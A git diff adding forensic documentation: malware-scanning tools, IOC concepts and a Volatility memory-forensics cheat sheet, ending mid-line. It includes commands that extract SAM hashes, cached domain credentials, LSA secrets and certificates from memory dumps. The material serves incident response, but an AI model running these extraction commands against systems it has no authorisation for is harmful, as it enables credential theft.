[VirusTotal](https://www.virustotal.com/gui/home/upload) +* [HybridAnalysis](https://www.hybrid-analysis.com) +* [Koodous](https://koodous.com/) +* [Intezer](https://analyze.intezer.com/) + +## Offline Antivirus and Detection Tools + +### Yara + +#### Install + +```bash +sudo apt-get install -y yara +``` + +#### Prepare rules + +Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9) +Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware. + +```bash +wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py +mkdir rules +python malware_yara_rules.py +``` + +#### Scan + +```bash +yara -w malware_rules.yar image #Scan 1 file +yara -w malware_rules.yar folder #Scan hole fodler +``` + +#### YaraGen: Check for malware and Create rules + +You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Checkout these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) + +```bash + python3 yarGen.py --update + python3.exe yarGen.py --excludegood -m ../../mals/ +``` + +### ClamAV + +#### Install + +```text +sudo apt-get install -y clamav +``` + +#### Scan + +```bash +sudo freshclam #Update rules +clamscan filepath #Scan 1 file +clamscan folderpath #Scan the hole folder +``` + +### IOCs + +IOC means Indicator Of Compromise. An IOC is a set of **conditions that identifies** some potentially unwanted software or a confirmed **malware**. Blue Teams use this kind of definitions to **search for this kind of malicious files** in their **systems** and **networks**. +To share these definitions is very useful as when a malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster. + +A tool to create or modify IOCs is ****[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.** +You can use tools such as ****[**Redline**](https://www.fireeye.com/services/freeware/redline.html) ****to **search for defined IOCs in a device**. + +### Loki + +\*\*\*\*[**Loki**](https://github.com/Neo23x0/Loki) ****is a scanner for Simple Indicators of Compromise. +Detection is based on four detection methods: + +```text +1. File Name IOC + Regex match on full file path/name + +2. Yara Rule Check + Yara signature match on file data and process memory + +3. Hash Check + Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files + +4. C2 Back Connect Check + Compares process connection endpoints with C2 IOCs (new since version v.10) +``` + +### Linux Malware Detect + +\*\*\*\*[**Linux Malware Detect \(LMD\)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. + +### rkhunter + +Tools like [**rkhunter**](http://rkhunter.sourceforge.net/) can be used to check the filesystem for possible **rootkits** and malware. + +```bash +sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] +``` + +### PEpper + +[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable \(binary data, entropy, URLs and IPs, some yara rules\). + +### NeoPI + +\*\*\*\*[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. + +### **php-malware-finder** + +\*\*\*\*[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. + +### Apple Binary Signatures + +When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.** + +```bash +#Get signer +codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" + +#Check if the app’s contents have been modified +codesign --verify --verbose /Applications/Safari.app + +#Check if the signature is valid +spctl --assess --verbose /Applications/Safari.app +``` + +## Detection Techniques + +### File Stacking + +If you know that some folder containing the **files** of a web server was **last updated in some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file. + +### Baselines + +If the files of a folder s**houldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**. + +### Statistical Analysis + +When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a webshell might be one of the most**. + diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md new file mode 100644 index 00000000000..e8f7ebb7b83 --- /dev/null +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -0,0 +1,33 @@ +# Memory dump analysis + +Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). + +## [Volatility](volatility-examples.md) + +The premiere open-source framework for memory dump analysis is [Volatility](volatility-examples.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool \(or a VMware memory image gathered by pausing the VM\). So, given the memory dump file and the relevant "profile" \(the OS from which the dump was gathered\), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifact. +From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) + +## Mini dump crash report + +When the dump is small \(just some KB, maybe a few MB\) the it's probably a mini dump crash report and not a memory dump. + +![](../../../.gitbook/assets/image%20%28305%29.png) + +If you hat Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed: + +![](../../../.gitbook/assets/image%20%28164%29.png) + +You can also load the exception and see the decompiled instructions + +![](../../../.gitbook/assets/image%20%282%29.png) + +![](../../../.gitbook/assets/image%20%28149%29.png) + +Anyway Visual Studio isn't the best tool to perform a analysis in depth of the dump. + +You should **open** it using **IDA** or **Radare** to inspection it in **depth**. + + + + + diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md new file mode 100644 index 00000000000..9f42689c73f --- /dev/null +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md @@ -0,0 +1,775 @@ +# Volatility - CheatSheet + +If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) + +```bash +python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # Will use most important plugins (could use a lot of space depending on the size of the memory) +``` + +## Installation + +### volatility3 + +```bash +git clone https://github.com/volatilityfoundation/volatility3.git +cd volatility3 +python3 setup.py install +python3 vol.py —h +``` + +### volatility2 + +{% tabs %} +{% tab title="Method1" %} +```text +Download the executable from https://www.volatilityfoundation.org/26 +``` +{% endtab %} + +{% tab title="Method 2" %} +```bash +git clone https://github.com/volatilityfoundation/volatility.git +cd volatility +python setup.py install +``` +{% endtab %} +{% endtabs %} + +## Volatility Commands + +Access the official doc in [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan) + +### A note on “list” vs. “scan” plugins + +Volatility has two main approaches to plugins, which are sometimes reflected in their names. “list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes \(locate and walk the linked list of `_EPROCESS` structures in memory\), OS handles \(locating and listing the handle table, dereferencing any pointers found, etc\). They more or less behave like the Windows API would if requested to, for example, list processes. + +That makes “list” plugins pretty fast, but just as vulnerable as the Windows API to manipulation by malware. For instance, if malware uses DKOM to unlink a process from the `_EPROCESS` linked list, it won’t show up in the Task Manager and neither will it in the pslist. + +“scan” plugins, on the other hand, will take an approach similar to carving the memory for things that might make sense when dereferenced as specific structures. `psscan` for instance will read the memory and try to make out `_EPROCESS` objects out of it \(it uses pool-tag scanning, which is basically searching for 4-byte strings that indicate the presence of a structure of interest\). The advantage is that it can dig up processes that have exited, and even if malware tampers with the `_EPROCESS` linked list, the plugin will still find the structure lying around in memory \(since it still needs to exist for the process to run\). The downfall is that “scan” plugins are a bit slower than “list” plugins, and can sometimes yield false-positives \(a process that exited too long ago and had parts of its structure overwritten by other operations\). + +From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/) + +## OS Profiles + +### Volatility3 + +As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_. +Symbol table packs for the various operating systems are available for **download** at: + +* [https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip) +* [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip) +* [https://downloads.volatilityfoundation.org/volatility3/symbols/linux.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/linux.zip) + +### Volatility2 + +#### External Profile + +You can get the list of supported profiles doing: + +```bash +./volatility_2.6_lin64_standalone --info | grep "Profile" +``` + +If you want to use a **new profile you have downloaded** \(for example a linux one\) you need to create somewhere the following folder structure: _plugins/overlays/linux_ and put inside this folder the zip file containing the profile. Then, get the number of the profiles using: + +```bash +./vol --plugins=/home/kali/Desktop/ctfs/final/plugins --info +Volatility Foundation Volatility Framework 2.6 + + +Profiles +-------- +LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 - A Profile for Linux CentOS7_3.10.0-123.el7.x86_64_profile x64 +VistaSP0x64 - A Profile for Windows Vista SP0 x64 +VistaSP0x86 - A Profile for Windows Vista SP0 x86 +``` + +You can **download Linux and Mac profiles** from [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles) + +In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64` , and you can use it executing something like: + +```bash +./vol -f file.dmp --plugins=. --profile=LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 linux_netscan +``` + +#### Discover Profile + +```text +volatility imageinfo -f file.dmp +volatility kdbgscan -f file.dmp +``` + +#### **Differences between imageinfo and kdbgscan** + +As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address \(if there happen to be multiple\). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile \(or if you have a profile suggestion from imageinfo\), then make sure you use it \(from [here](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/)\). + +Always take a look in the **number of procceses that kdbgscan has found**. Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile** but only the **valid one will have some process related** \(This is because in order to extract processes the correct KDBG address is needed\) + +```bash +# GOOD +PsActiveProcessHead : 0xfffff800011977f0 (37 processes) +PsLoadedModuleList : 0xfffff8000119aae0 (116 modules) +``` + +```bash +# BAD +PsActiveProcessHead : 0xfffff800011947f0 (0 processes) +PsLoadedModuleList : 0xfffff80001197ac0 (0 modules) +``` + +#### KDBG + +The **kernel debugger block** \(named KdDebuggerDataBlock of the type \_KDDEBUGGER\_DATA64, or **KDBG** by volatility\) is important for many things that Volatility and debuggers do. For example, it has a reference to the PsActiveProcessHead which is the list head of all processes required for process listing. + +## OS Information + +```bash +#vol3 has a plugin to give OS information (note that imageinfo from vol2 will give you OS info) +./vol.py -f file.dmp windows.info.Info +``` + +The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump. + +## Hashes/Passwords + +Extract SAM hashes, [domain cached credentials](../../../windows/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows/authentication-credentials-uac-and-efs.md#lsa-secrets). + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.hashdump.Hashdump #Grab common windows hashes (SAM+SYSTEM) +./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry +./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 hashdump -f file.dmp #Grab common windows hashes (SAM+SYSTEM) +volatility --profile=Win7SP1x86_23418 cachedump -f file.dmp #Grab domain cache hashes inside the registry +volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets +``` +{% endtab %} +{% endtabs %} + +## Memory Dump + +The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**. + +```text +volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/ +``` + +## Processes + +### List processes + +Try to find **suspicious** processes \(by name\) or **unexpected** child **processes** \(for example a cmd.exe as a child of iexplorer.exe\). +It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes. + +{% tabs %} +{% tab title="vol3" %} +```bash +python3 vol.py -f file.dmp windows.pstree.PsTree # Get processes tree (not hidden) +python3 vol.py -f file.dmp windows.pslist.PsList # Get process list (EPROCESS) +python3 vol.py -f file.dmp windows.psscan.PsScan # Get hidden process list(malware) +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=PROFILE pstree -f file.dmp # Get process tree (not hidden) +volatility --profile=PROFILE pslist -f file.dmp # Get process list (EPROCESS) +volatility --profile=PROFILE psscan -f file.dmp # Get hidden process list(malware) +volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list +``` +{% endtab %} +{% endtabs %} + +### Dump proc + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f file.dmp +``` +{% endtab %} +{% endtabs %} + +### Command line + +Anything suspicious was executed? + +{% tabs %} +{% tab title="vol3" %} +```bash +python3 vol.py -f file.dmp windows.cmdline.CmdLine #Display process command-line arguments +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=PROFILE cmdline -f file.dmp #Display process command-line arguments +volatility --profile=PROFILE consoles -f file.dmp #command history by scanning for _CONSOLE_INFORMATION +``` +{% endtab %} +{% endtabs %} + +Commands entered into cmd.exe are processed by **conhost.exe** \(csrss.exe prior to Windows 7\). So even if an attacker managed to **kill the cmd.exe** **prior** to us obtaining a memory **dump**, there is still a good chance of **recovering history** of the command line session from **conhost.exe’s memory**. If you find **something weird** \(using the consoles modules\), try to **dump** the **memory** of the **conhost.exe associated** process and **search** for **strings** inside it to extract the command lines. + +### Environment + +Get the env variables of each running process. There could be some interesting values. + +{% tabs %} +{% tab title="vol3" %} +```bash +python3 vol.py -f file.dmp windows.envars.Envars [--pid ] #Display process environment variables +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=PROFILE envars -f file.dmp [--pid ] #Display process environment variables + +volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated +``` +{% endtab %} +{% endtabs %} + +### Token privileges + +Check for privileges tokens in unexpected services. +It could be interesting to list the processes using some privileged token. + +{% tabs %} +{% tab title="vol3" %} +```bash +#Get enabled privileges of some processes +python3 vol.py -f file.dmp windows.privileges.Privs [--pid ] +#Get all processes with interesting privileges +python3 vol.py -f file.dmp windows.privileges.Privs | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege" +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +#Get enabled privileges of some processes +volatility --profile=Win7SP1x86_23418 privs --pid=3152 -f file.dmp | grep Enabled +#Get all processes with interesting privileges +volatility --profile=Win7SP1x86_23418 privs -f file.dmp | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege" +``` +{% endtab %} +{% endtabs %} + +### SIDs + +Check each SSID owned by a process. +It could be interesting to list the processes using a privileges SID \(and the processes using some service SID\). + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.getsids.GetSIDs [--pid ] #Get SIDs of processes +./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 getsids -f file.dmp #Get the SID owned by each process +volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of each service +``` +{% endtab %} +{% endtabs %} + +### Handles + +Useful to know to which other files, keys, threads, processes... a **process has a handle** for \(has opened\) + +{% tabs %} +{% tab title="vol3" %} +```bash +vol.py -f file.dmp windows.handles.Handles [--pid ] +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=] +``` +{% endtab %} +{% endtabs %} + +### DLLs + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.dlllist.DllList [--pid ] #List dlls used by each +./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory process + +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 dlllist --pid=3152 -f file.dmp #Get dlls of a proc +volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dmp #Dump dlls of a proc +``` +{% endtab %} +{% endtabs %} + +### Strings per processes + +Volatility allows to check to which process does a string belongs to. + +{% tabs %} +{% tab title="vol3" %} +```bash +strings file.dmp > /tmp/strings.txt +./vol.py -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.txt +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +strings file.dmp > /tmp/strings.txt +volatility -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.txt + +volatility -f /tmp/file.dmp --profile=Win81U1x64 memdump -p 3532 --dump-dir . +strings 3532.dmp > strings_file +``` +{% endtab %} +{% endtabs %} + +It also allows to search for strings inside a process using the yarascan module: + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.vadyarascan.VadYaraScan --yara-rules "https://" --pid 3692 3840 3976 3312 3084 2784 +./vol.py -f file.dmp yarascan.YaraScan --yara-rules "https://" +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3312,3084,2784 +``` +{% endtab %} +{% endtabs %} + +### UserAssist + + **Windows** systems maintain a set of **keys** in the registry database \(**UserAssist keys**\) to keep track of programs that executed. The number of executions and last execution date and time are available in these **keys**. + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.registry.userassist.UserAssist +``` +{% endtab %} + +{% tab title="vol2" %} +``` +volatility --profile=Win7SP1x86_23418 -f file.dmp userassist +``` +{% endtab %} +{% endtabs %} + +## Services + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.svcscan.SvcScan #List services +./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +#Get services and binary path +volatility --profile=Win7SP1x86_23418 svcscan -f file.dmp +#Get name of the services and SID (slow) +volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp +``` +{% endtab %} +{% endtabs %} + +## Network + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.netscan.NetScan +#For network info of linux use volatility2 +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 netscan -f file.dmp +volatility --profile=Win7SP1x86_23418 connections -f file.dmp#XP and 2003 only +volatility --profile=Win7SP1x86_23418 connscan -f file.dmp#TCP connections +volatility --profile=Win7SP1x86_23418 sockscan -f file.dmp#Open sockets +volatility --profile=Win7SP1x86_23418 sockets -f file.dmp#Scanner for tcp socket objects + +volatility --profile=SomeLinux -f file.dmp linux_ifconfig +volatility --profile=SomeLinux -f file.dmp linux_netstat +volatility --profile=SomeLinux -f file.dmp linux_netfilter +volatility --profile=SomeLinux -f file.dmp linux_arp #ARP table +volatility --profile=SomeLinux -f file.dmp linux_list_raw #Processes using promiscuous raw sockets (comm between processes) +volatility --profile=SomeLinux -f file.dmp linux_route_cache +``` +{% endtab %} +{% endtabs %} + +## Registry hive + +### Print available hives + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.registry.hivelist.HiveList #List roots +./vol.py -f file.dmp windows.registry.printkey.PrintKey #List roots and get initial subkeys +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 -f file.dmp hivelist #List roots +volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get initial subkeys +``` +{% endtab %} +{% endtabs %} + +### Get a value + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows NT\CurrentVersion" +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 printkey -K "Software\Microsoft\Windows NT\CurrentVersion" -f file.dmp +# Get Run binaries registry value +volatility -f file.dmp --profile=Win7SP1x86 printkey -o 0x9670e9d0 -K 'Software\Microsoft\Windows\CurrentVersion\Run' +``` +{% endtab %} +{% endtabs %} + +### Dump + +```bash +#Dump a hive +volatility --profile=Win7SP1x86_23418 hivedump -o 0x9aad6148 -f file.dmp #Offset extracted by hivelist +#Dump all hives +volatility --profile=Win7SP1x86_23418 hivedump -f file.dmp +``` + +## Filesystem + +### Mount + +{% tabs %} +{% tab title="vol3" %} +```bash +#See vol2 +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=SomeLinux -f file.dmp linux_mount +volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the entire filesystem (if possible) +``` +{% endtab %} +{% endtabs %} + +### Scan/dump + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.filescan.FileScan #Scan for files inside the dump +./vol.py -f file.dmp windows.dumpfiles.DumpFiles --physaddr <0xAAAAA> #Offset from previous command +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 filescan -f file.dmp #Scan for files inside the dump +volatility --profile=Win7SP1x86_23418 dumpfiles -n --dump-dir=/tmp -f file.dmp #Dump all files +volatility --profile=Win7SP1x86_23418 dumpfiles -n --dump-dir=/tmp -Q 0x000000007dcaa620 -f file.dmp + +volatility --profile=SomeLinux -f file.dmp linux_enumerate_files +volatility --profile=SomeLinux -f file.dmp linux_find_file -F /path/to/file +volatility --profile=SomeLinux -f file.dmp linux_find_file -i 0xINODENUMBER -O /path/to/dump/file +``` +{% endtab %} +{% endtabs %} + +### Master File Table + +{% tabs %} +{% tab title="vol3" %} +```bash +# I couldn't find any plugin to extract this information in volatility3 +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 mftparser -f file.dmp +``` +{% endtab %} +{% endtabs %} + +The NTFS file system contains a file called the _master file table_, or MFT. There is at least one entry in the MFT for every file on an NTFS file system volume, including the MFT itself. **All information about a file, including its size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries. From [here](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table). + +### SSL Keys/Certs + +{% tabs %} +{% tab title="vol3" %} +```bash +#vol3 allows to search for certificates inside the registry +./vol.py -f file.dmp windows.registry.certificates.Certificates +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +#vol2 allos you to search and dump certificates from memory +#Interesting options for this modules are: --pid, --name, --ssl +volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp +``` +{% endtab %} +{% endtabs %} + +## Malware + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.malfind.Malfind [--dump] #Find hidden and injected code, [dump each suspicious section] +#Malfind will search for suspicious structures related to malware +./vol.py -f file.dmp windows.driverirp.DriverIrp #Driver IRP hook detection +./vol.py -f file.dmp windows.ssdt.SSDT #Check system call address from unexpected addresses + +./vol.py -f file.dmp linux.check_afinfo.Check_afinfo #Verifies the operation function pointers of network protocols +./vol.py -f file.dmp linux.check_creds.Check_creds #Checks if any processes are sharing credential structures +./vol.py -f file.dmp linux.check_idt.Check_idt #Checks if the IDT has been altered +./vol.py -f file.dmp linux.check_syscall.Check_syscall #Check system call table for hooks +./vol.py -f file.dmp linux.check_modules.Check_modules #Compares module list to sysfs info, if available +./vol.py -f file.dmp linux.tty_check.tty_check #Checks tty devices for hooks +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 -f file.dmp malfind [-D /tmp] #Find hidden and injected code [dump each suspicious section] +volatility --profile=Win7SP1x86_23418 -f file.dmp apihooks #Detect API hooks in process and kernel memory +volatility --profile=Win7SP1x86_23418 -f file.dmp driverirp #Driver IRP hook detection +volatility --profile=Win7SP1x86_23418 -f file.dmp ssdt #Check system call address from unexpected addresses + +volatility --profile=SomeLinux -f file.dmp linux_check_afinfo +volatility --profile=SomeLinux -f file.dmp linux_check_creds +volatility --profile=SomeLinux -f file.dmp linux_check_fop +volatility --profile=SomeLinux -f file.dmp linux_check_idt +volatility --profile=SomeLinux -f file.dmp linux_check_syscall +volatility --profile=SomeLinux -f file.dmp linux_check_modules +volatility --profile=SomeLinux -f file.dmp linux_check_tty +volatility --profile=SomeLinux -f file.dmp linux_keyboard_notifiers #Keyloggers +``` +{% endtab %} +{% endtabs %} + +### Scanning with yara + +Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9) +Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware. + +{% tabs %} +{% tab title="vol3" %} +```bash +wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py +mkdir rules +python malware_yara_rules.py +#Only Windows +./vol.py -f file.dmp windows.vadyarascan.VadYaraScan --yara-file /tmp/malware_rules.yar +#All +./vol.py -f file.dmp yarascan.YaraScan --yara-file /tmp/malware_rules.yar +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py +mkdir rules +python malware_yara_rules.py +volatility --profile=Win7SP1x86_23418 yarascan -y malware_rules.yar -f ch2.dmp | grep "Rule:" | grep -v "Str_Win32" | sort | uniq +``` +{% endtab %} +{% endtabs %} + +## MISC + +### External plugins + +If you want to use an external plugins make sure that the plugins related folder is the first parameter used. + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py --plugin-dirs "/tmp/plugins/" [...] +``` +{% endtab %} + +{% tab title="vol2" %} +```bash + volatilitye --plugins="/tmp/plugins/" [...] +``` +{% endtab %} +{% endtabs %} + +#### Autoruns + +Download it from [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns) + +```text + volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns +``` + +### Mutexes + +{% tabs %} +{% tab title="vol3" %} +```text +./vol.py -f file.dmp windows.mutantscan.MutantScan +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 mutantscan -f file.dmp +volatility --profile=Win7SP1x86_23418 -f file.dmp handles -p -t mutant +``` +{% endtab %} +{% endtabs %} + +### Symlinks + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp windows.symlinkscan.SymlinkScan +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 -f file.dmp symlinkscan +``` +{% endtab %} +{% endtabs %} + +### Bash + +It's possible to **read from memory the bash history.** You could also dump the _.bash\_history_ file, but it was disabled you will be glad you can use this volatility module + +{% tabs %} +{% tab title="vol3" %} +```text +./vol.py -f file.dmp linux.bash.Bash +``` +{% endtab %} + +{% tab title="vol2" %} +``` +volatility --profile=Win7SP1x86_23418 -f file.dmp linux_bash +``` +{% endtab %} +{% endtabs %} + +### TimeLine + +{% tabs %} +{% tab title="vol3" %} +```bash +./vol.py -f file.dmp timeLiner.TimeLiner +``` +{% endtab %} + +{% tab title="vol2" %} +``` +volatility --profile=Win7SP1x86_23418 -f timeliner +``` +{% endtab %} +{% endtabs %} + +### Drivers + +{% tabs %} +{% tab title="vol3" %} +```text +./vol.py -f file.dmp windows.driverscan.DriverScan +``` +{% endtab %} + +{% tab title="vol2" %} +```bash +volatility --profile=Win7SP1x86_23418 -f file.dmp driverscan +``` +{% endtab %} +{% endtabs %} + +### Get clipboard + +```bash +#Just vol2 +volatility --profile=Win7SP1x86_23418 clipboard -f file.dmp +``` + +### Get IE history + +```bash +#Just vol2 +volatility --profile=Win7SP1x86_23418 iehistory -f file.dmp +``` + +### Get notepad text + +```bash +#Just vol2 +volatility --profile=Win7SP1x86_23418 notepad -f file.dmp +``` + +### Screenshot + +```bash +#Just vol2 +volatility 